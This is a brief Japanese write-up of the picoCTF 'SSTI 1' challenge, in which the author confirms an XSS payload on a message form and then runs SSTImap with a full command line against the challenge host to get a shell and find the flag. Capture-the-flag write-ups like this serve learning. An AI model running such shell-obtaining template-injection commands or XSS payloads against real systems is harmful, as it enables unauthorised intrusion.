SSTI 1 Write Up
問題
Formになにかメッセージいれるとh1タグでメッセージが表示されるWebSiteを攻撃する問題です。
解き方
まず、XSSを試しました。
<script>alert();</script>
すると、このようにXSSが通るのでXSSを使って攻撃します。
問題文にSSTIとあったので、SSTIについて色々調べるとこのようなツールを見つけたので試しました。
- いろいろなツールの情報をまとめたやつ
PayloadsAllTheThings - 今回使ったツール
SSTIMap
python3 ./sstimap.py -M POST -u "http://rescued-float.picoctf.net:61219/" -d "content=hello" -s
| option | data |
|---|---|
| -M | Method |
| -u | URL |
| -d | data_column=data |
| -s | get a shell |
はい、このようにShellをgetできたのでとりあえずlsしたらflagがあったので終わりです。
